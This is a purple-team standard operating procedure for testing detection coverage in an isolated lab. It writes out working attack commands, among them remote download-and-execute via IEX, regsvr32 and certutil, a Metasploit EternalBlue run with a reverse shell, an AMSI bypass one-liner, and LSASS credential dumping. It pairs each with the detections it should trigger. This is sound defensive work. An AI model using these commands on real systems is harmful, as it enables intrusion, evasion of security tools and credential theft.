Skip to main content
Synced from an Obsidian vault

For graph and advanced features, download the full Intel Codex Vault and open it in Obsidian.

Detection & Evasion Testing SOP (Purple Team)

Purpose: Validate detection coverage by simulating adversary techniques in a controlled environment. Test both detection capabilities (blue team) and evasion techniques (red team) to improve security posture.

Lab Only: Never test evasion techniques in production without explicit authorization and coordination.

Table of Contents

1. Pre-Engagement & Authorization

Authorization Requirements

Mandatory Approvals:

  • Written authorization from CISO/Security Leadership
  • IT Operations approval (lab infrastructure usage)
  • SOC/Incident Response team briefing and consent
  • Legal review (if applicable)
  • Change control board approval (if required)

Scope Definition:

Authorization Must Include:
- Test environment boundaries (specific systems/networks)
- Allowed techniques and tools
- Testing timeframe and schedule
- Halt criteria and escalation procedures
- Authorized testers (names and contact info)
- Success/failure criteria

Lab Environment Requirements

Isolated Test Environment:

# Infrastructure requirements:
1. Isolated network segment (no production connectivity)
2. Dedicated test systems (VMs preferred for snapshots)
3. Separate telemetry pipeline (non-production SIEM/EDR)
4. Snapshot capability for rapid rollback
5. Representative configuration (mirrors production controls)

# Network isolation verification:
- Firewall rules blocking production access
- Air-gapped or dedicated VLAN
- Separate Active Directory domain (if applicable)
- Test accounts only (no production credentials)

Pre-Test Checklist:

  • Baseline snapshots created for all test systems
  • Monitoring/logging confirmed operational
  • Test accounts created and validated
  • SOC notified of test window
  • Rollback procedures documented and tested
  • Communication channels established (Slack, Teams, etc.)
  • Halt signal defined (safe word, email, emergency contact)

2. Threat Intelligence & Hypothesis Development

Threat Modeling

Identify Threat Actors Relevant to Organization:

  • APT groups targeting your industry (financial, healthcare, energy, etc.)
  • Commodity malware and ransomware families
  • Insider threats (malicious and negligent)
  • Supply chain attack vectors

MITRE ATT&CK Framework Mapping:

Select tactics/techniques to test based on:
1. Threat intelligence (active campaigns targeting your sector)
2. Recent incidents or near-misses
3. Control gaps identified in prior assessments
4. New detection capabilities being validated

Example Focus Areas:
- Initial Access: Phishing, exploiting public-facing apps
- Execution: PowerShell, WMI, scheduled tasks
- Persistence: Registry run keys, services, scheduled tasks
- Privilege Escalation: UAC bypass, token manipulation
- Defense Evasion: Obfuscation, process injection, AMSI bypass
- Credential Access: Credential dumping, Kerberoasting
- Discovery: Network scanning, user enumeration
- Lateral Movement: Pass-the-Hash, RDP, PsExec
- Collection: Screen capture, clipboard data
- Exfiltration: C2 channels, DNS tunneling

Hypothesis Formulation

Detection Hypotheses (Blue Team Perspective):

Example Hypotheses:
1. "Our EDR will detect PowerShell obfuscation using Base64 encoding"
2. "Sysmon Event ID 10 (Process Access) will capture credential dumping via LSASS"
3. "SIEM correlation rule will alert on multiple failed login attempts followed by success"
4. "Network monitoring will detect C2 beaconing patterns"
5. "File integrity monitoring will alert on unauthorized changes to system binaries"

Hypothesis Template:
"When [RED TEAM ACTION], we expect [BLUE TEAM CONTROL] to [DETECT/ALERT/BLOCK] within [TIME THRESHOLD] with [FIDELITY LEVEL]"

3. Test Planning & Scenario Design

Control Coverage Matrix

Map Techniques to Controls:

| MITRE Technique | Detection Control | Expected Alert | Coverage Gap |
|-----------------|-------------------|----------------|--------------|
| T1059.001 (PowerShell) | EDR + Script Block Logging | High confidence alert | None |
| T1003.001 (LSASS Dump) | Sysmon Event ID 10 + EDR | Critical alert | Memory only |
| T1021.001 (RDP) | Windows Security Event 4624 | Medium alert | No lateral movement correlation |
| T1071.001 (C2 Web) | Proxy logs + NetFlow | Low alert (noise) | Need tuning |

Success Metrics

Define Measurable Outcomes:

  • Detection Rate: % of techniques detected by at least one control
  • Time to Detect (TTD): Median time from execution to alert generation
  • Time to Triage (TTT): Time from alert to analyst investigation
  • False Positive Rate: Alerts generated by benign test activity
  • Fidelity: Quality of alert context (high/medium/low confidence)
  • Coverage: % of ATT&CK matrix covered by active detections

Example Thresholds:

Success Criteria:
- Detection Rate: ≥ 80% for critical techniques
- TTD: ≤ 5 minutes for in-memory attacks
- TTT: ≤ 15 minutes during business hours
- False Positive Rate: ≤ 5% of total alerts
- High Fidelity Alerts: ≥ 60% of detections

Test Scenarios

Scenario Template:

## Scenario: Credential Dumping via Mimikatz

**Objective**: Validate detection of credential theft

**MITRE Techniques**:
- T1003.001 (LSASS Memory Dump)
- T1003.002 (Security Account Manager)

**Expected Detections**:
1. EDR behavioral detection (process injection into LSASS)
2. Sysmon Event ID 10 (ProcessAccess to lsass.exe)
3. SIEM correlation (suspicious process + LSASS access + privilege token use)

**Execution Steps**:
1. Launch Mimikatz from test directory
2. Execute: `sekurlsa::logonpasswords`
3. Document alerts generated
4. Verify credential hashes NOT exported (benign test only)

**Cleanup**:
- Terminate Mimikatz process
- Delete test artifacts
- Restore snapshot if persistence was tested

4. Adversary Simulation Tools & Techniques

Red Team Testing Frameworks

MITRE Caldera:

# Automated adversary emulation platform
# https://github.com/mitre/caldera

# Install
git clone https://github.com/mitre/caldera.git
cd caldera
pip install -r requirements.txt
python server.py

# Access: http://localhost:8888
# Select adversary profile (e.g., APT29, APT3)
# Deploy agent to test system
# Execute operation and observe detections

Atomic Red Team:

# Atomic tests for ATT&CK techniques
# https://github.com/redcanaryco/atomic-red-team

# Install
Install-Module -Name invoke-atomicredteam

# Import
Import-Module invoke-atomicredteam

# List techniques
Get-AtomicTechnique

# Execute specific test
Invoke-AtomicTest T1059.001  # PowerShell execution

# Execute with parameters
Invoke-AtomicTest T1003.001 -TestGuids "a96872b2-cbf3-46cf-8eb4-27e8c0e85660"

# Cleanup after test
Invoke-AtomicTest T1059.001 -Cleanup

Infection Monkey:

# Automated lateral movement and network propagation testing
# https://www.guardicore.com/infectionmonkey/

# Deploy in isolated network
# Configure targets (test systems only)
# Select attack techniques
# Execute and monitor propagation
# Review telemetry in dashboard

Cobalt Strike (Commercial):

# C2 framework for red team operations
# Use only with proper licensing and authorization

# Features:
- Beacon implant deployment
- Process injection techniques
- Lateral movement via PsExec, WMI, SSH
- Credential harvesting
- Evasion capabilities (malleable C2, AMSI bypass)

# Purple team use:
- Test detection of C2 beacons
- Validate network monitoring (JA3, DNS, HTTP patterns)
- Test EDR behavioral detections

Metasploit Framework:

# Open-source penetration testing framework
msfconsole

# Example: Test SMB exploit detection
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

# Verify detection of:
# - Network scan (Nmap/Metasploit pre-exploitation)
# - SMB exploit attempt
# - Reverse shell connection
# - Meterpreter process injection

Specific Evasion Techniques to Test

1. PowerShell Obfuscation:

# Base64 encoding
$command = "Write-Host 'Test Detection'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encoded

# String concatenation
$c1 = "Write"
$c2 = "-Host"
$c3 = "'Evade Detection'"
IEX "$c1$c2 $c3"

# Invoke-Expression with download
IEX (New-Object Net.WebClient).DownloadString('http://test-server/script.ps1')

# Expected Detections:
# - Script Block Logging (Event ID 4104)
# - Module Logging (Event ID 4103)
# - EDR behavioral detection (suspicious script execution)

2. LOLBins (Living Off the Land Binaries):

# MSBuild.exe (code execution)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe malicious.csproj

# Regsvr32.exe (COM scriptlet execution)
regsvr32 /s /n /u /i:http://test-server/test.sct scrobj.dll

# CertUtil (file download)
certutil -urlcache -split -f http://test-server/payload.exe payload.exe

# Expected Detections:
# - Process creation from unusual parent (Sysmon Event ID 1)
# - Network connection from unexpected binary (Sysmon Event ID 3)
# - Command-line logging showing suspicious parameters

3. Process Injection:

# DLL Injection
# CreateRemoteThread API → inject DLL into target process

# Process Hollowing
# Create suspended process → replace memory → resume

# Reflective DLL Injection
# Load DLL directly into memory (no disk artifacts)

# Expected Detections:
# - Sysmon Event ID 8 (CreateRemoteThread)
# - Sysmon Event ID 10 (ProcessAccess with suspicious rights)
# - EDR behavioral detection (memory allocation patterns)

4. AMSI Bypass:

# AMSI (Anti-Malware Scan Interface) bypass techniques

# Reflection-based bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Expected Detections:
# - Script Block Logging (full script content)
# - EDR monitoring of AMSI tampering
# - Memory scanning for known bypass patterns

5. Credential Dumping:

# Mimikatz
mimikatz.exe "sekurlsa::logonpasswords" "exit"

# Impacket secretsdump
secretsdump.py -sam sam.save -system system.save LOCAL

# ProcDump + Mimikatz (two-stage)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Transfer lsass.dmp offline, analyze with Mimikatz

# Expected Detections:
# - Sysmon Event ID 10 (ProcessAccess to lsass.exe)
# - EDR behavioral (credential access pattern)
# - Security Event 4656 (handle to LSASS)

5. Execution & Monitoring

Execution Protocol

Pre-Execution:

# 1. Verify test environment isolation
ping production-server.example.com  # Should fail

# 2. Confirm monitoring is active
# Check SIEM/EDR console for heartbeat from test systems

# 3. Notify SOC via designated channel
"Purple Team Test START - Scenario: [NAME] - Expected Duration: [TIME]"

# 4. Start packet capture (if network testing)
tcpdump -i eth0 -w test_capture.pcap

# 5. Document baseline state
Get-Process > pre_test_processes.txt  # Windows
ps aux > pre_test_processes.txt       # Linux

During Execution:

# Execute technique with detailed logging
# Example: PowerShell with transcript
Start-Transcript -Path C:\Logs\purple_team_test.log
# [Execute test technique]
Stop-Transcript

# Monitor for alerts in real-time
# - SIEM dashboard
# - EDR console
# - Email/Slack notifications

# Document observations:
- Time of execution (UTC)
- Command/tool used
- Alerts generated (alert ID, rule name, timestamp)
- False positives triggered
- Detection gaps (no alert when expected)

Post-Execution:

# 1. Execute cleanup procedures
Remove-Item C:\Temp\test_payload.exe
Remove-Item HKCU:\Software\Test\PersistenceKey

# 2. Verify cleanup
Get-ChildItem C:\Temp\test_*  # Should be empty

# 3. Collect telemetry
# Export SIEM alerts for test window
# Export EDR events for test endpoints
# Save packet capture

# 4. Notify SOC of test completion
"Purple Team Test END - Scenario: [NAME] - Review alerts and provide feedback"

# 5. Restore snapshot if destructive testing occurred
# VMware: Revert to snapshot "pre_purple_test"
# Hyper-V: Apply checkpoint

Data Collection

Telemetry Sources to Review:

# Windows Event Logs
wevtutil epl Security C:\Logs\Security_test.evtx
wevtutil epl System C:\Logs\System_test.evtx
wevtutil epl "Microsoft-Windows-Sysmon/Operational" C:\Logs\Sysmon_test.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" C:\Logs\PowerShell_test.evtx

# Linux Logs
cp /var/log/syslog /evidence/syslog_test.txt
cp /var/log/auth.log /evidence/auth_test.txt
journalctl --since "2025-10-05 14:00:00" --until "2025-10-05 15:00:00" > journalctl_test.txt

# EDR/SIEM Exports
# Export alerts matching test timeframe
# Export raw events from test endpoints
# Document query used and export format

6. Analysis & Gap Identification

Detection Coverage Analysis

For Each Tested Technique:

## Technique: T1059.001 (PowerShell)

**Test Executed**: Base64-encoded PowerShell command
**Command**: `powershell.exe -encodedCommand [BASE64]`
**Timestamp**: 2025-10-05 14:32:15 UTC

**Detection Results**:
**Detected by**:
- EDR: Alert "Suspicious PowerShell Execution" (High confidence)
- Sysmon: Event ID 1 (Process Creation) logged command line
- PowerShell Script Block Logging: Event ID 4104 captured decoded script

**Missed by**:
- SIEM correlation rule (no alert generated)
- Network monitoring (no DNS/HTTP activity to correlate)

**Detection Quality**:
- TTD (Time to Detect): 12 seconds
- TTT (Time to Triage): 8 minutes (analyst reviewed alert)
- Fidelity: High (low false positive history for this rule)
- Context: Full command line captured, parent process identified

**Gap Analysis**:
- SIEM rule not tuned for encoded PowerShell (only checks for "-encodedCommand" flag)
- No correlation with user behavior analytics (was this user expected to run PowerShell?)

**Recommendations**:
1. Update SIEM rule to decode Base64 and search for known malicious patterns
2. Implement UBA baseline for PowerShell usage per user/role
3. Alert on PowerShell from unusual parent processes (Word, Excel, etc.)

False Positive Analysis

Document Benign Activity Triggering Alerts:

False Positive Example:
- Alert: "Credential Access via Registry"
- Trigger: Legitimate backup software reading SAM hive
- Root Cause: Rule too broad (any registry access to SAM/SECURITY)
- Recommendation: Add exception for backup process (signed binary, expected schedule)

Evasion Success Tracking

If Technique Evaded Detection:

## Evasion Success: Process Injection via QueueUserAPC

**Technique**: T1055.004 (Asynchronous Procedure Call)
**Tool**: Custom injector

**Why Detection Failed**:
1. EDR heuristics did not flag QueueUserAPC API call
2. Sysmon Event ID 8 (CreateRemoteThread) not triggered (different injection method)
3. No memory scanning at time of injection

**Exploit Conditions**:
- Unsigned injector binary
- Injection into legitimate process (explorer.exe)
- No network activity post-injection (stayed dormant)

**Remediation**:
- Implement ETW (Event Tracing for Windows) monitoring for thread creation APIs
- Add memory scanning on suspicious process access events
- Deploy YARA rules to detect injection frameworks

7. Reporting & Improvement

Executive Summary Template

# Purple Team Exercise Report
**Date**: 2025-10-05
**Duration**: 4 hours
**Participants**: Red Team (3), Blue Team (5), SOC (2)

## Objectives
Validate detection coverage for credential access and lateral movement techniques used by APT29.

## Summary
- **Techniques Tested**: 12
- **Techniques Detected**: 9 (75%)
- **High-Fidelity Alerts**: 7 (78%)
- **False Positives**: 3
- **Critical Gaps**: 3 (privilege escalation, evasion, persistence)

## Key Findings
**Strengths**:
- PowerShell logging and EDR provide excellent coverage
- Lateral movement via RDP detected consistently
- Credential dumping from LSASS detected in < 30 seconds

**Weaknesses**:
- Process injection techniques evaded EDR behavioral detection
- LOLBins (MSBuild, Regsvr32) not monitored
- C2 beaconing patterns not correlated in SIEM

## Recommendations
1. **Immediate**: Deploy Sysmon config update for process injection monitoring
2. **Short-term** (30 days): Implement LOLBin detection rules (Sigma/Splunk)
3. **Long-term** (90 days): Enhance C2 detection with JA3 fingerprinting and beaconing analysis

Improvement Tracking

Action Items with Owners:

| Priority | Finding | Recommended Action | Owner | Due Date | Status |
|----------|---------|-------------------|-------|----------|--------|
| P1 | Process injection not detected | Deploy Sysmon config v15 | SecOps | 2025-10-12 | In Progress |
| P1 | MSBuild execution not alerted | Create SIEM rule for LOLBins | SOC Lead | 2025-10-15 | Pending |
| P2 | C2 beaconing not correlated | Implement JA3/JA3S monitoring | NetSec | 2025-11-01 | Planning |
| P3 | UBA not detecting anomalous PowerShell | Tune UBA baseline for PowerShell | SIEM Admin | 2025-12-01 | Backlog |

8. Safety & Legal

Safety Protocols

Never:

  • Test in production without isolated telemetry
  • Use real malware or exploit kits
  • Exfiltrate actual sensitive data
  • Perform denial of service attacks
  • Pivot beyond authorized scope
  • Test without SOC coordination

Always:

  • Use benign simulators (Atomic Red Team, Caldera)
  • Maintain rollback capability (snapshots)
  • Coordinate timing with SOC
  • Document every action with timestamps
  • Verify isolation before execution
  • Stop immediately on unexpected behavior

Authorization Documentation:

  • Signed approval from CISO/CIO
  • Scope clearly defined and acknowledged
  • Indemnification (if external red team involved)
  • NDA/confidentiality agreements
  • Safe harbor clause for good-faith testing

Compliance:

  • No violations of Computer Fraud and Abuse Act (CFAA)
  • Respect organizational acceptable use policies
  • No testing of third-party services without consent
  • Proper handling of any discovered vulnerabilities

9. Tools Reference

ToolPurposeLink
Red Team Frameworks
Atomic Red TeamTechnique-specific testsgithub.com/redcanaryco/atomic-red-team
MITRE CalderaAutomated adversary emulationgithub.com/mitre/caldera
Infection MonkeyLateral movement testingguardicore.com/infectionmonkey
Cobalt StrikeC2 framework (commercial)cobaltstrike.com
MetasploitExploitation frameworkmetasploit.com
Detection Tools
SysmonWindows event loggingdocs.microsoft.com/sysinternals
SigmaGeneric detection rulesgithub.com/SigmaHQ/sigma
YARAPattern matchingvirustotal.github.io/yara
Analysis
ATT&CK NavigatorTechnique coverage mappingmitre-attack.github.io/attack-navigator
DeTT&CTDetection coverage scoringgithub.com/rabobank-cdc/DeTTECT

10. Common Pitfalls

  • ❌ Testing without proper authorization (legal risk)
  • ❌ Using production systems (availability/integrity risk)
  • ❌ Not coordinating with SOC (alert fatigue, missed detections)
  • ❌ Forgetting cleanup procedures (persistence artifacts remain)
  • ❌ Not documenting methodology (can't reproduce results)
  • ❌ Testing too many techniques at once (difficult to correlate)
  • ❌ Ignoring false positives (alert tuning opportunity missed)
  • ❌ Not retesting after remediation (validate fixes)
  • ❌ Poor communication (red/blue team siloed)
  • ❌ Treating this as red team vs. blue team (collaborative improvement, not competition)

Analysis:

Pentesting & Security: